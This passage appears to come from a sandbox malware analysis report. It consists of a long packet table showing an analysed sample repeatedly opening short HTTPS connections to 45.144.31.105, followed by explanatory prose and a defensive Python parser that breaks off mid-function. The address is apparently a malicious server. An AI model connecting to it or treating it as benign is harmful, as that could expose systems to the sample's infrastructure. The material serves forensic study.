                                                                                    Oct 15, 2024 15:54:06.361155033 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361329079 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361429930 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.361437082 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361502886 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361567020 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.361571074 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361582994 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361670971 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.361679077 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.405415058 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.405424118 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.452370882 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.477001905 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477066994 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477092981 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477125883 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477139950 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.477149963 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477226019 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.477245092 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.477309942 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.477314949 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.519886971 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.519912958 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.519943953 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.519956112 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.520143032 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.592159986 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592216015 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592266083 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.592278004 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592681885 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592715025 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592734098 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.592742920 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592776060 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592798948 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.592808962 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.592907906 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.635802984 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.635945082 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.635997057 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.636007071 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.686702967 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.686712027 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708539963 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708667040 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708668947 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.708697081 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708743095 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.708781958 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708921909 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.708998919 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.709048986 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.709058046 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.709207058 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.751566887 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.751633883 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.751665115 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.751698971 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.751708984 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.751787901 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.824007034 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.824201107 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.824280977 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.824290991 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.824321985 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.827789068 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.827797890 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.874217987 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.939860106 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.939903021 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.939933062 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.939956903 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.939966917 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.939987898 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.939989090 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.940017939 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.940037966 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.940037966 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.940114021 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.055109978 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.055131912 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.055246115 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.055257082 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.055314064 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.170759916 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.170780897 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.170859098 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.170872927 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.170983076 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.214246035 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.214298010 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.214353085 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.214361906 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.214371920 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.214421988 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.331661940 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.331727028 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.331773043 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.331785917 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.331800938 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.335773945 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.403969049 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.404032946 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.404102087 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:07.404123068 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.404123068 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:07.404145956 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:56.197858095 CEST4434974645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.197896004 CEST4434974645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.323678970 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.323726892 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.323798895 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.340085983 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.340110064 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.340142965 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.367953062 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.368026018 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.368117094 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.383234978 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.383265972 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.383331060 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.493709087 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.493740082 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.493829966 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.509331942 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.509351015 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.509401083 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.933973074 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.934016943 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.934092045 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.953305960 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.953342915 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.953419924 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.698755980 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.698869944 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.698947906 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.716434956 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.716450930 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.716511965 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.551069021 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.551105022 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.551177025 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.753562927 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.753586054 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.753654957 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.855933905 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.855971098 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.856040955 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.885205030 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.885221958 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.885291100 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.363965034 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.364017010 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.364144087 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.383949041 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.383994102 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.384102106 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.462805033 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.462846041 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.463073015 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.478976011 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.478992939 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.479079008 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.573898077 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.573935986 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.574067116 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.590547085 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.590569973 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.590701103 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.916441917 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.916482925 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.916547060 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.933551073 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.933576107 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.933610916 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.697297096 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.697350979 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.697408915 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.715661049 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.715682030 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.715728045 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.776952982 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.777002096 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.777077913 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.795645952 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.795666933 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.795778990 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.300882101 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.300925016 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.301078081 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.325185061 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.325200081 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.325261116 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.385668039 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.385710955 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.385770082 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.406167984 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.406183004 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.406212091 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.463968992 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.463994980 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.464051008 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.483233929 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.483243942 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.483268976 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.541465998 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.541508913 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.541615963 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.557761908 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.557777882 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.557826996 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.622113943 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.622159004 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.622215986 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.642785072 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.642796993 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.642833948 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.700881958 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.700939894 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.700993061 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.720679045 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.720701933 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.720741987 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:24.706754923 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:24.706809998 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:24.706877947 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:25.034327984 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:25.034354925 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:25.034421921 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.775739908 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.775789976 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.775971889 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.791914940 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.791929960 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.791990042 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.838218927 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.838269949 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.838471889 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.854386091 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.854435921 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.854506016 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.900142908 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.900181055 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.900361061 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.917256117 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.917284012 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.917366028 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.965270996 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.965308905 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.965467930 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.983139992 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.983156919 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.983208895 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.033865929 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.033926010 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.034086943 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.058046103 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.058079004 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.058136940 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.108529091 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.108577967 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.108818054 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.133655071 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.133671999 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.133737087 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.185498953 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.185551882 CEST4434977345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.185677052 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.212757111 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.212780952 CEST4434977345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.212842941 CEST4434977345.144.31.105192.168.2.9
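The rows above fuse the five columns (timestamp, source port, destination port, source IP, destination IP) into one string, and they show 32 separate connection attempts to 45.144.31.105:443 (client ports 49742 through 49773), each a six-packet exchange that is over within a few hundred milliseconds before the sample tries again from a new client port. The Python below is an added example, not part of the Joe Sandbox report: it splits the fused rows back into fields and measures the gap between successive attempts per destination. The split relies on two assumptions stated in the code, that the analysis host is 192.168.2.9 and that its client ports come from the Windows dynamic range 49152-65535; without them a string such as `49742443192.168.2.945.144.31.105` has more than one valid reading. The sample rows are copied from the TCP and UDP tables of this report.

```python
"""Split the fused packet rows of this report back into columns and
measure how often the sample re-connects to each destination.

Added example for this page; not Joe Sandbox code.  Assumptions: the
analysis host is 192.168.2.9 and its client ports come from the Windows
dynamic range 49152-65535; those two facts are what make a fused row
splittable without guessing.  SAMPLE_ROWS are copied from the report's
TCP and UDP packet tables.
"""
import re
from collections import defaultdict
from datetime import datetime

LOCAL_IP = "192.168.2.9"      # sandbox host, from the report (assumption)
EPHEMERAL_MIN = 49152         # Windows default dynamic port range start (assumption)

ROW_RE = re.compile(
    r"^(?P<date>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) "
    r"[A-Z]+(?P<rest>\d[\d.]*)$"
)

SAMPLE_ROWS = [  # copied from the report tables
    "Oct 15, 2024 15:54:52.401650906 CEST49742443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:54:52.401700020 CEST4434974245.144.31.105192.168.2.9",
    "Oct 15, 2024 15:54:52.401794910 CEST49742443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:54:52.416898966 CEST49742443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:54:52.416917086 CEST4434974245.144.31.105192.168.2.9",
    "Oct 15, 2024 15:54:52.416965008 CEST4434974245.144.31.105192.168.2.9",
    "Oct 15, 2024 15:54:55.762814045 CEST49743443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:54:55.903928041 CEST49744443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:55:00.367953062 CEST49748443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:55:03.933973074 CEST49750443192.168.2.945.144.31.105",
    "Oct 15, 2024 15:54:01.693068027 CEST5662753192.168.2.91.1.1.1",
    "Oct 15, 2024 15:54:01.700234890 CEST53566271.1.1.1192.168.2.9",
]


def _octets_ok(ip):
    return all(0 <= int(o) <= 255 for o in ip.split("."))


def _candidates(rest):
    """Every reading of 'sport dport sip dip' hidden in the fused field.
    The digits before the first dot hold both ports plus sip's first
    octet; sip's last octet and dip's first octet share one dot-group."""
    head, _, tail = rest.partition(".")
    groups = tail.split(".")
    if len(groups) != 6:          # 3 remaining sip octets + 4 dip octets, one pair fused
        return
    fused = groups[2]
    for n in (1, 2, 3):           # width of sip's first octet
        if len(head) <= n + 1:    # need at least two port digits left
            break
        ports, oct1 = head[:-n], head[-n:]
        for k in range(1, len(fused)):
            sip = ".".join([oct1, groups[0], groups[1], fused[:k]])
            dip = ".".join([fused[k:], *groups[3:]])
            for p in range(1, len(ports)):
                yield int(ports[:p]), int(ports[p:]), sip, dip


def _plausible(sport, dport, sip, dip):
    if not (_octets_ok(sip) and _octets_ok(dip)):
        return False
    if not (1 <= sport <= 65535 and 1 <= dport <= 65535):
        return False
    if (sip == LOCAL_IP) == (dip == LOCAL_IP):   # exactly one end is the sandbox host
        return False
    local_port = sport if sip == LOCAL_IP else dport
    return local_port >= EPHEMERAL_MIN


def parse_row(line):
    """(timestamp, sport, dport, sip, dip); raises if the row stays ambiguous."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    ts = datetime.strptime(m["date"], "%b %d, %Y %H:%M:%S")
    ts = ts.replace(microsecond=int(m["frac"][:6].ljust(6, "0")))
    readings = {c for c in _candidates(m["rest"]) if _plausible(*c)}
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} plausible readings for {m['rest']!r}")
    return (ts, *readings.pop())


def connection_cadence(rows):
    """Per 'ip:port' the sandbox host talked to: number of distinct client
    ports (one per connection attempt) and the seconds between the first
    outbound packet of successive attempts."""
    first_packet = {}
    for line in rows:
        ts, sport, dport, sip, dip = parse_row(line)
        if sip == LOCAL_IP:
            first_packet.setdefault((f"{dip}:{dport}", sport), ts)
    starts = defaultdict(list)
    for (dst, _sport), ts in first_packet.items():
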